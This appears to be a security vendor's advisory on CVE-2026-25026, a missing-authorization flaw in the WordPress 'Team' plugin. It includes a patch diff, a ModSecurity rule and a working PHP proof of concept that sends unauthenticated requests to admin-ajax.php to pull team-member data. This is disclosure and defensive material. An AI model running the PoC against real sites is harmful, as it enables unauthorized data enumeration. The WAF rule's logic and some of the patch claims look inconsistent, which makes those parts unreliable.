What is CVE-2026-25026?

CVE-2026-25026 is a medium severity vulnerability in the Team – Team Members Showcase Plugin for WordPress, affecting versions up to and including 5.0.11. It is caused by a missing authorization check that allows unauthenticated users to perform unauthorized actions.

How does this vulnerability work?

The vulnerability allows attackers to send crafted AJAX requests to the WordPress admin-ajax.php endpoint without authentication. By specifying a team member ID, attackers can retrieve sensitive information about published team members due to the lack of capability checks.

Who is affected by CVE-2026-25026?

Any WordPress site using the Team – Team Members Showcase Plugin version 5.0.11 or earlier is affected. Site administrators should check their plugin version to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Team – Team Members Showcase Plugin installed on your WordPress site. If it is version 5.0.11 or earlier, your site is at risk.

How can I fix this vulnerability?

The vulnerability is fixed in version 5.0.12 of the plugin. Administrators should update the Team – Team Members Showcase Plugin to the latest version to mitigate the risk.

What does a CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that should be addressed promptly to prevent unauthorized access.

What are the practical risks associated with this vulnerability?

The primary risk is unauthorized information disclosure, allowing attackers to enumerate and access details of published team member profiles. Although it does not allow modification or privilege escalation, it can expose sensitive data.

What is the proof of concept for this vulnerability?

The proof of concept involves sending a POST request to the vulnerable AJAX endpoint with a specific action and member ID. This demonstrates how attackers can exploit the vulnerability to retrieve sensitive information without authentication.

What steps should I take after updating the plugin?

After updating the plugin, review your site’s security settings and monitor for any unusual activity. Additionally, consider conducting a security audit to ensure no other vulnerabilities exist.

Is there any additional mitigation I can implement?

In addition to updating the plugin, consider implementing security plugins that provide additional layers of protection such as firewall rules, login attempts monitoring, and user role management.

How does the patch improve security?

The patch in version 5.0.12 adds critical validation checks to ensure that the requested team member ID corresponds to a published post of the correct type. This prevents unauthorized access to sensitive data.

Where can I find more information about CVE-2026-25026?

More information about CVE-2026-25026 can be found on the official CVE database, security advisories from the plugin developer, and security-focused websites that track vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-25026: Team – Team Members Showcase Plugin <= 5.0.11 – Missing Authorization (tlp-team)

CVE ID CVE-2026-25026

Plugin tlp-team

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 5.0.11

Patched Version 5.0.12

Disclosed March 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25026:
The vulnerability is a Missing Authorization flaw in the Team – Team Members Showcase WordPress plugin, affecting all versions up to and including 5.0.11. The flaw allows unauthenticated attackers to perform unauthorized actions via a specific AJAX handler, leading to potential information disclosure. The CVSS score of 5.3 indicates a medium severity impact.

Atomic Edge research identifies the root cause in the file `tlp-team/app/Controllers/Frontend/Ajax/SmartPopup.php`. The `SmartPopup` class handles AJAX requests for fetching team member details. The vulnerable code, prior to the patch, accepted an `id` parameter from unauthenticated users via the `wp_ajax_nopriv_` hook. The function lacked any capability check or validation to ensure the requested post object was a published team member of the correct type. This missing authorization allowed direct access to the data retrieval logic.

The exploitation method involves sending a crafted HTTP POST request to the WordPress `admin-ajax.php` endpoint. Attackers set the `action` parameter to `tlp_team_smart_popup` and provide a target member ID via the `id` parameter. No authentication cookies or nonces are required. The vulnerable AJAX hook `wp_ajax_nopriv_tlp_team_smart_popup` processes this request, fetches the post data for the specified ID, and returns potentially sensitive member details in the JSON response.

The patch, applied in version 5.0.12, adds a critical validation step in `SmartPopup.php`. After receiving the request ID, the code now retrieves the corresponding post object. It performs three checks: it verifies the post exists, confirms its post type matches the plugin’s custom type (`rttlp_team()->post_type`), and ensures its status is `publish`. If any check fails, the function sends a JSON error with a 403 status, terminating execution. This prevents unauthorized access to non-existent, non-team, or non-published posts.

Successful exploitation leads to unauthorized information disclosure. Attackers can enumerate and retrieve details of published team member profiles. This could expose data intended for public viewing, but the flaw also creates a content enumeration vector. The vulnerability does not directly allow modification, privilege escalation, or remote code execution. The impact is confined to data exposure from published posts of the specific custom post type.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/tlp-team/app/Controllers/Frontend/Ajax/SmartPopup.php
+++ b/tlp-team/app/Controllers/Frontend/Ajax/SmartPopup.php
@@ -45,6 +45,14 @@
 				'error' => $error,
 			] );
 		}
+        $member_post = get_post(absint($_REQUEST['id']) );
+        if (
+            !$member_post ||
+            $member_post->post_type !== rttlp_team()->post_type ||
+            $member_post->post_status !== 'publish'
+        ) {
+            wp_send_json_error(array('error' => __('Unauthorized or member not found','tlp-team')), 403);
+        }
 		if ( ! empty( $_REQUEST['id'] ) ) {
 			global $post;
 			$post = get_post( absint( $_REQUEST['id'] ) );
--- a/tlp-team/tlp-team.php
+++ b/tlp-team/tlp-team.php
@@ -4,7 +4,7 @@
  * Plugin URI: https://radiustheme.com/tlp-team-for-wordpress/
  * Description: Team is a fully responsive and mobile friendly team member profile display plugin.
  * Author: Team Members by RadiusTheme
- * Version: 5.0.11
+ * Version: 5.0.12
  * Author URI: www.radiustheme.com
  * Text Domain: tlp-team
  * License: GPLv3
@@ -20,7 +20,7 @@
  * Defining Constants.
  */
 define( 'TLP_TEAM_NAME', 'Team' );
-define( 'TLP_TEAM_VERSION', '5.0.11' );
+define( 'TLP_TEAM_VERSION', '5.0.12' );
 define( 'TLP_TEAM_PATH', plugin_dir_path(__FILE__) );
 define( 'TLP_TEAM_AUTHOR', 'RadiusTheme' );
 define( 'EDD_TLP_TEAM_STORE_URL', 'https://www.radiustheme.com' );

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-25026
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:100025026,phase:2,deny,status:403,chain,msg:'CVE-2026-25026 via Team Members Showcase Plugin AJAX - Missing Authorization',severity:'CRITICAL',tag:'CVE-2026-25026',tag:'WordPress',tag:'Plugin:tlp-team'"
  SecRule ARGS_POST:action "@streq tlp_team_smart_popup" "chain"
    SecRule &ARGS_POST:id "!@eq 1" "t:none,setvar:'tx.cve_2026_25026_score=+%{tx.critical_anomaly_score}',setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25026 - Team – Team Members Showcase Plugin <= 5.0.11 - Missing Authorization
<?php

$target_url = 'http://example.com/wp/wp-admin/admin-ajax.php'; // CHANGE THIS
$member_id = 123; // CHANGE THIS to a target team member post ID

// Craft the POST request payload for the vulnerable AJAX action.
$post_data = array(
    'action' => 'tlp_team_smart_popup', // The vulnerable AJAX hook.
    'id' => $member_id // The parameter specifying which team member to fetch.
);

// Initialize cURL session.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Optional: Set a user agent to mimic a real browser request.
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 Atomic Edge PoC');

// Execute the request.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output the results.
echo "HTTP Status Code: $http_coden";
echo "Response Body:n";
print_r($response);

?>

Frequently Asked Questions

What is CVE-2026-25026?
Overview of the vulnerability
CVE-2026-25026 is a medium severity vulnerability in the Team – Team Members Showcase Plugin for WordPress, affecting versions up to and including 5.0.11. It is caused by a missing authorization check that allows unauthenticated users to perform unauthorized actions.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send crafted AJAX requests to the WordPress admin-ajax.php endpoint without authentication. By specifying a team member ID, attackers can retrieve sensitive information about published team members due to the lack of capability checks.
Who is affected by CVE-2026-25026?
Identifying vulnerable users
Any WordPress site using the Team – Team Members Showcase Plugin version 5.0.11 or earlier is affected. Site administrators should check their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Version verification
To check if your site is vulnerable, verify the version of the Team – Team Members Showcase Plugin installed on your WordPress site. If it is version 5.0.11 or earlier, your site is at risk.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is fixed in version 5.0.12 of the plugin. Administrators should update the Team – Team Members Showcase Plugin to the latest version to mitigate the risk.
What does a CVSS score of 5.3 indicate?
Understanding the severity rating
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that should be addressed promptly to prevent unauthorized access.
What are the practical risks associated with this vulnerability?
Potential impacts on data security
The primary risk is unauthorized information disclosure, allowing attackers to enumerate and access details of published team member profiles. Although it does not allow modification or privilege escalation, it can expose sensitive data.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept involves sending a POST request to the vulnerable AJAX endpoint with a specific action and member ID. This demonstrates how attackers can exploit the vulnerability to retrieve sensitive information without authentication.
What steps should I take after updating the plugin?
Post-update recommendations
After updating the plugin, review your site’s security settings and monitor for any unusual activity. Additionally, consider conducting a security audit to ensure no other vulnerabilities exist.
Is there any additional mitigation I can implement?
Enhancing security measures
In addition to updating the plugin, consider implementing security plugins that provide additional layers of protection such as firewall rules, login attempts monitoring, and user role management.
How does the patch improve security?
Changes made in the updated version
The patch in version 5.0.12 adds critical validation checks to ensure that the requested team member ID corresponds to a published post of the correct type. This prevents unauthorized access to sensitive data.
Where can I find more information about CVE-2026-25026?
Resources for further reading
More information about CVE-2026-25026 can be found on the official CVE database, security advisories from the plugin developer, and security-focused websites that track vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations